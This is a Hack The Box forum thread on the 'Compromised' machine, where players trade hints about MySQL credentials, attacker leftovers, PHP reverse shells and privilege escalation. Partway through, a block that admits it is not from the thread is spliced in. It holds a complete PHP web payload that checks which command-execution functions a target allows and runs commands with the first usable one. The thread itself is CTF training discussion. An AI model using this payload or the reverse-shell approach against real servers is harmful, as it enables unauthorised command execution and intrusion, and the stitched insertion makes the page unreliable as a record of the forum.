Official Compromised Discussion


Comments

  • edited November 2020

    Hack The Box
    Hi Guys

  • @Vigneshar said:

    Hi Guys

    Hi

    TazWake

    Note: https://www.nohello.com/

    Happy to help people but PLEASE explain your problem in as much detail as possible! If you say vague things like "It's not working", I can't help. This isn't Twitter so my DMs are always open.

    Currently have very limited HTB time but will try to respond as quickly as possible.

  • Can I get a nudge please? I can read files and list dirs. I tried to extract info from proc but found nothing of use. I used m**** to read files in the home of user m**** but couldn't get anything back. I know I need to use s** with m**** but I seem to be missing where to get the data that will allow me to do that.


  • @abogaida said:

    Can I get a nudge please? I can read files and list dirs. I tried to extract info from proc but found nothing of use. I used m**** to read files in the home of user m**** but couldn't get anything back.

    As well as reading files, what else can you do to them?

    I know I need to use s** with m**** but I seem to be missing where to get the data that will allow me to do that.

    TazWake


  • @TazWake said:

    @abogaida said:

    Can I get a nudge please? I can read files and list dirs. I tried to extract info from proc but found nothing of use. I used m**** to read files in the home of user m**** but couldn't get anything back.

    As well as reading files, what else can you do to them?

    I know I need to use s** with m**** but I seem to be missing where to get the data that will allow me to do that.

    I tried writing them but it didn't work. I see I am restricted to one dir with the m**** user and it is the place where I would like to drop something to allow me not to s**.


  • @abogaida said:

    I tried writing them but it didn't work.

    Possibly investigate how you are using them. There is a lot of stuff in this thread about how to issue the commands in a way which should give you the access you want.

    I see I am restricted to one dir with the m**** user and it is the place where I would like to drop something to allow me not to s**.

    I never noticed any restrictions like that. It might be worth double-checking what is happening.

    TazWake


  • So, I'm pretty sure I know what to do to get from foothold to the next user, but without write privileges to that certain folder, I have no idea how to achieve this. A certain config setting of the m**** service disallows reading from/writing to that folder (and the "current other" user doesn't have any privileges on that folder either).
    If anyone could give a nudge in the right direction (or point out my mistake), it would be much appreciated :)


    Hack The Box
    GREM | OSCE | GASF | eJPT

  • @HomeSen said:

    So, I'm pretty sure I know what to do to get from foothold to the next user, but without write privileges to that certain folder, I have no idea how to achieve this. A certain config setting of the m**** service disallows reading from/writing to that folder (and the "current other" user doesn't have any privileges on that folder either).
    If anyone could give a nudge in the right direction (or point out my mistake), it would be much appreciated :)

    Have a look to see if the attackers, or someone on the system, left something useful behind. Possibly in the built in tables.

    DM me for more specific language because I appreciate the vagueness here might be confusing.

    TazWake


  • edited November 2020

    Thanks, @TazWake. Will look into the other stuff tomorrow. Now it's time for some overdue sleep :D



  • Man, I'm about to say bad words!!! Why in the hell do I keep receiving this "WARNING: Failed to daemonise. This is quite common and not fatal. () "? I looked at the PHP functions that are disabled and uploaded another rev PHP shell, but nothing! FUCK

    Why 50 53R10U5

  • @Jk3r said:

    Man, I'm about to say bad words!!! Why in the hell do I keep receiving this "WARNING: Failed to daemonise. This is quite common and not fatal. () "? I looked at the PHP functions that are disabled and uploaded another rev PHP shell, but nothing! FUCK

    It quite often means something went wrong with Pentestmonkey's reverse PHP shell.

    It doesn't always mean the shell failed so you might want to check if anything is hitting the listener or if something else is the problem.

    If other shells are failing you might need to do some deeper troubleshooting.

    TazWake

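    A note on where that warning comes from, with an added probe script that is not part of the thread and not pentestmonkey's code: php-reverse-shell.php prints "WARNING: Failed to daemonise. This is quite common and not fatal." whenever pcntl_fork() is unavailable, which is the normal state of web-server PHP (the pcntl extension is usually CLI-only), so the line on its own says nothing about why the shell did not come back. What decides the outcome is whether the outbound connection reaches the listener and whether proc_open(), which the script uses to spawn /bin/sh, survives disable_functions. The script below, dropped on the target under an assumed name such as probe.php and requested through the web server so that it runs under the same php.ini as the reverse shell, reports which execution primitives are blocked, missing or usable and runs a command with the first usable one; the function names are this example's own.

```php
<?php
// Added example, not code from the thread or from pentestmonkey.
// Probe the execution primitives a PHP reverse shell depends on, under the
// php.ini that the web server actually uses (request this file via HTTP).

// Order roughly follows what a reverse shell needs. pcntl_fork is only used
// for the daemonise step: when it is absent the shell prints the "Failed to
// daemonise" warning and carries on. proc_open is what php-reverse-shell.php
// uses to spawn "/bin/sh -i"; if that is disabled the shell connects and then
// dies without ever giving a prompt.
const EXEC_PRIMITIVES = [
    'pcntl_fork',
    'proc_open',
    'popen',
    'shell_exec',
    'exec',
    'system',
    'passthru',
];

/** Names listed in disable_functions, trimmed and with empties removed. */
function disabled_functions(): array
{
    $raw = (string) ini_get('disable_functions');
    return array_values(array_filter(array_map('trim', explode(',', $raw))));
}

/**
 * Classify each primitive as 'disabled' (blocked by php.ini), 'missing'
 * (extension not loaded, e.g. pcntl on mod_php/php-fpm) or 'ok'.
 * The disable_functions list is checked first because function_exists()
 * also returns false for disabled functions and would hide the difference.
 */
function probe_primitives(): array
{
    $disabled = disabled_functions();
    $status = [];
    foreach (EXEC_PRIMITIVES as $fn) {
        if (in_array($fn, $disabled, true)) {
            $status[$fn] = 'disabled';
        } elseif (!function_exists($fn)) {
            $status[$fn] = 'missing';
        } else {
            $status[$fn] = 'ok';
        }
    }
    return $status;
}

/** Run $cmd with the first usable primitive; returns [name, output] or null. */
function run_with_first_usable(string $cmd): ?array
{
    $status = probe_primitives();
    if ($status['proc_open'] === 'ok') {
        $spec = [0 => ['pipe', 'r'], 1 => ['pipe', 'w'], 2 => ['pipe', 'w']];
        $proc = proc_open($cmd, $spec, $pipes);
        if (is_resource($proc)) {
            fclose($pipes[0]);
            $out = stream_get_contents($pipes[1]) . stream_get_contents($pipes[2]);
            fclose($pipes[1]);
            fclose($pipes[2]);
            proc_close($proc);
            return ['proc_open', $out];
        }
    }
    if ($status['popen'] === 'ok') {
        $fh = popen($cmd . ' 2>&1', 'r');
        if ($fh !== false) {
            $out = stream_get_contents($fh);
            pclose($fh);
            return ['popen', $out];
        }
    }
    if ($status['shell_exec'] === 'ok') {
        return ['shell_exec', (string) shell_exec($cmd . ' 2>&1')];
    }
    if ($status['exec'] === 'ok') {
        exec($cmd . ' 2>&1', $lines);
        return ['exec', implode("\n", $lines) . "\n"];
    }
    if ($status['system'] === 'ok') {
        ob_start();
        system($cmd . ' 2>&1');
        return ['system', (string) ob_get_clean()];
    }
    if ($status['passthru'] === 'ok') {
        ob_start();
        passthru($cmd . ' 2>&1');
        return ['passthru', (string) ob_get_clean()];
    }
    return null;
}

header('Content-Type: text/plain');
echo 'disable_functions = ' . ini_get('disable_functions') . "\n\n";
foreach (probe_primitives() as $fn => $state) {
    printf("%-11s %s\n", $fn, $state);
}
$result = run_with_first_usable('id');
echo "\n" . ($result === null
    ? "no usable execution primitive found\n"
    : "ran 'id' via {$result[0]}:\n{$result[1]}");
```

    If the probe shows pcntl_fork as missing but proc_open as ok, the warning is just noise and the next thing to check is the network path to the listener (egress filtering on the target, wrong IP/port in the script). If proc_open is disabled, swapping the spawn in the reverse shell for whichever primitive the probe reports as ok is the fix, rather than uploading more copies of the same script.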

  • @TazWake said:

    If other shells are failing you might need to do some deeper troubleshooting.

    That's the f**king problem, I'm not good at PHP! :lol:


  • @TazWake said:

    Have a look to see if the attackers, or someone on the system, left something useful behind. Possibly in the built in tables.

    DM me for more specific language because I appreciate the vagueness here might be confusing.

    The vagueness was just right. Managed to grab user. Thanks :)

    And for the last step, I assume that something else was left behind, somewhere. Guess, I need to enum even more :/



  • @HomeSen said:

    The vagueness was just right. Managed to grab user. Thanks :)

    Phew - glad to have helped a bit.

    And for the last step, I assume that something else was left behind, somewhere. Guess, I need to enum even more :/

    Yeah, they might have changed something to get in through the back door.

    TazWake


  • This box FAQ'd my head off :lol: Anyway, rooted!! Thanks @TazWake for the help. PM me if anyone needs help...


  • edited November 2020

    Rooted. What an awesome ride. Thank you @TazWake for the nudges along the way. I really need to dig deeper into Linux forensics.
    Thank you @D4nch3n for a great box. Really loved it from start to finish :)



  • Done & Dusted!

    Boy that trip caused several "Double Palm" / "DOH!!!!" moments as well as "walk away... just walk away..." moments. @TazWake again thank you for your hints and advice in these forums / discussions they were just the nudges I needed without having to "call a friend" :wink:

    Cheers @D4nch3n for the fun / maddening at times machine.

  • Rooted!
    Really interesting BOX!

    Thanks @D4nch3n !

  • edited November 2020

    Got a POC working and can start navigating around the system. With that I was able to do research and found a way to circumvent functionality that is disabled. Found a user that shouldn't have a certain setting enabled but he does. Pulled on that thread but it seems that the directory I want to write to and the directory that comes back as part of a query with privs are two different ones. Don't know if I can pivot any further or if someone dorked the box on purpose. Any guidance?

    GRID, GPEN

  • @weeeeeeeeee said:

    Got a POC working and can start navigating around the system. With that I was able to do research and found a way to circumvent functionality that is disabled. Found a user that shouldn't have a certain setting enabled but he does. Pulled on that thread but it seems that the directory I want to write to and the directory that comes back as part of a query with privs are two different ones. Don't know if I can pivot any further or if someone dorked the box on purpose. Any guidance?

    This is on purpose. I suggest taking a look at @TazWake's response, here: https://forum.hackthebox.eu/discussion/comment/87478/#Comment_87478



  • edited November 2020

    @HomeSen said:

    @weeeeeeeeee said:

    Got a POC working and can start navigating around the system. With that I was able to do research and found a way to circumvent functionality that is disabled. Found a user that shouldn't have a certain setting enabled but he does. Pulled on that thread but it seems that the directory I want to write to and the directory that comes back as part of a query with privs are two different ones. Don't know if I can pivot any further or if someone dorked the box on purpose. Any guidance?

    This is on purpose. I suggest taking a look at @TazWake's response, here: https://forum.hackthebox.eu/discussion/comment/87478/#Comment_87478

    Understood, and thank you for the refresher. I did find that juicy nugget. Was working that avenue but so far it has been unfruitful. Maybe it's time to use a bigger hammer against it.

    ----Edit: found the right hammer, this box is dope so far. Definitely mirrors some real world applications.


  • Hi, anyone I can DM about user?

  • @freez3r said:

    Hi, anyone I can DM about user?

    If you shoot me a DM I might be able to help out.


  • edited November 2020

    id
    uid=0(root) gid=0(root) groups=0(root)
    whoami
    root

    Definitely an interesting privesc technique, gonna keep that one in my back pocket. :wink:


  • I'm stuck on foothold :( I can browse files and found m***l running but somehow fail to leverage anything to gain user rights. And I think I know what prevents connections from the outside world. I read the hints in this thread and did my best at enumerating. It is very possible that I already found something and just do not know how to leverage it.

    I would be very grateful for hints.

  • @netburger said:

    I'm stuck on foothold :( I can browse files and found m***l running but somehow fail to leverage anything to gain user rights. And I think I know what prevents connections from the outside world. I read the hints in this thread and did my best at enumerating. It is very possible that I already found something and just do not know how to leverage it.

    I would be very grateful for hints.

    Read the b***up, find the log, read it, and you might find the creds!


  • @Jk3r said:

    Read the b***up, find the log, read it, and you might find the creds!

    I found them. Because of them I am able to browse files.
    My access is not interactive (is this my mistake?) and I failed to use those creds at any other place.

    Hard to explain it without spoilers. Maybe DM, anyone? :)

  • @netburger said:

    Hard to explain it without spoilers. Maybe DM, anyone? :)

    Ping me!


  • @netburger said:

    I found them. Because of them I am able to browse files.
    My access is not interactive (is this my mistake?) and I failed to use those creds at any other place.

    Hard to explain it without spoilers. Maybe DM, anyone? :)

    You can use the creds to enumerate a part of the service which allows users to define functions.

    TazWake


  • Does anyone have a link, an article, anything, that would help me understand what I'm supposed to do to get user? I can read files via a very unhandy way of issuing commands, but everything I've tried so far to retrieve information from the user that shouldn't be able to log in has been a dead end.

    P.S.: Generally speaking, if your hint is "Enum" or "Google", don't bother please.
